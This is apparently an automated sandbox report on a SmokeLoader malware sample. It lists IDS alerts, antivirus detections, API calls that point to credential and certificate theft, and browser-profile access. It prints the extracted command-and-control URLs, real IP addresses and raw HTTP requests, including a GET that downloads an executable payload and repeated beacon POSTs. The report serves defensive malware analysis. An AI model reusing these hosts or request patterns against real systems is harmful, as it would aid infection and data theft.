2024-10-03T23:28:41.984717+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50018	23.145.40.162	443	TCP
2024-10-03T23:28:42.951800+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50019	23.145.40.162	443	TCP
2024-10-03T23:28:43.941251+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50020	23.145.40.162	443	TCP
2024-10-03T23:28:50.255577+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50021	23.145.40.162	443	TCP
2024-10-03T23:30:05.677019+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50027	23.145.40.162	443	TCP
2024-10-03T23:30:25.257975+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50029	23.145.40.162	443	TCP
2024-10-03T23:30:37.074358+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50031	23.145.40.162	443	TCP
2024-10-03T23:30:56.286836+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.5	50033	23.145.40.162	443	TCP

ETPRO MALWARE SmokeLoader encrypted module (3)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T23:28:27.911603+0200	2829848	2	Potentially Bad Traffic	23.145.40.162	443	192.168.2.5	50004	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 9VgIkx4su0.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\dghchav	Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Roaming\eihchav	Avira: detection malicious, Label: HEUR/AGEN.1310247

Found malware configuration

Source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\eihchav	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: 9VgIkx4su0.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\dghchav	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\eihchav	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 9VgIkx4su0.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Code function: 8_2_00007FF6DFE236F0 CryptExportKey,CryptExportKey,	8_2_00007FF6DFE236F0
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Code function: 8_2_00007FF6DFE23220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,	8_2_00007FF6DFE23220
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E3098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,	10_2_006E3098
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E3717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,	10_2_006E3717
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E3E04 RtlCompareMemory,CryptUnprotectData,	10_2_006E3E04
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E11E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,	10_2_006E11E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E1198 CryptBinaryToStringA,CryptBinaryToStringA,	10_2_006E1198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,	10_2_006E123B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E1FCE CryptUnprotectData,RtlMoveMemory,	10_2_006E1FCE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 15_2_0019245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	15_2_0019245E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 15_2_00192404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	15_2_00192404
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 15_2_0019263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	15_2_0019263E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_02FE25A4 CryptBinaryToStringA,CryptBinaryToStringA,	18_2_02FE25A4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_02FE2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	18_2_02FE2799

Source: 9VgIkx4su0.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\9VgIkx4su0.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50004 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50008 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50009 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50029 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50033 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Code function: 8_2_00007FF6DFE2FB4C GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,	8_2_00007FF6DFE2FB4C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	10_2_006E2B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	10_2_006E1D4A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	10_2_006E3ED9
Source: C:\Windows\explorer.exe	Code function: 13_2_00CB30A8 FindFirstFileW,FindNextFileW,FindClose,	13_2_00CB30A8

Source: C:\Users\user\AppData\Roaming\dghchav

Code function: 38_2_004010E0 GetNumberFormatW,EnumCalendarInfoA,SetFileAttributesW,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,CopyFileW,GetStdHandle,GetComputerNameW,ClearCommBreak,InterlockedDecrement,EnumCalendarInfoA,GetTempPathA,_memset,CommConfigDialogW,GetVersionExW,CreateActCtxA,InterlockedIncrement,GetShortPathNameA,EnumCalendarInfoA,GetLocaleInfoA,SetVolumeMountPointA,GlobalWire,CreateEventW,

38_2_004010E0

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49765 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49798 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49755 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49776 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49836 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49826 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49866 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49875 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49807 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49896 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49905 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49915 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49925 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49886 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49815 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49943 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49847 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49955 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49962 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49787 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49933 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49973 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50001 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50002 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49983 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50003 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50022 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50025 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50023 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50024 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49995 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50030 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50032 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49857 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50026 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50028 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50016 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50017 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50033 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50033 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50016 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50018 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50014 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50017 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50027 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50018 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50027 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50014 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50006 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50009 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50004 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50004 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50006 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50008 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50020 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50005 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50009 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50008 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50012 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50007 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50012 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50005 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50007 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50013 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50013 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50021 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50011 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50020 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50011 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50021 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50010 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50010 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50019 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50019 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50015 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50015 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50029 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50031 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50029 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50031 -> 23.145.40.162:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 187.131.253.169 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.224.203.37 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 23.145.40.162 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php

Source: Joe Sandbox View	IP Address: 190.224.203.37 190.224.203.37
Source: Joe Sandbox View	IP Address: 190.224.203.37 190.224.203.37
Source: Joe Sandbox View	IP Address: 23.145.40.164 23.145.40.164

Source: Joe Sandbox View	ASN Name: UninetSAdeCVMX UninetSAdeCVMX
Source: Joe Sandbox View	ASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US

Source: Joe Sandbox View	JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.162:443 -> 192.168.2.5:50004

Source: global traffic	HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ilsdlpkysrci.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://bebgtshlvflmuxm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ujkayjvdqul.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://eycfcgwvugnqxe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://uggcvdvmydqspblb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ipavwsqiqelj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://bullivvhvmuc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://kheehglmstrxeo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://jhcyskiuwnguyo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://frkpgrboqqf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://atbscwbcvtybbp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: calvinandhalls.com
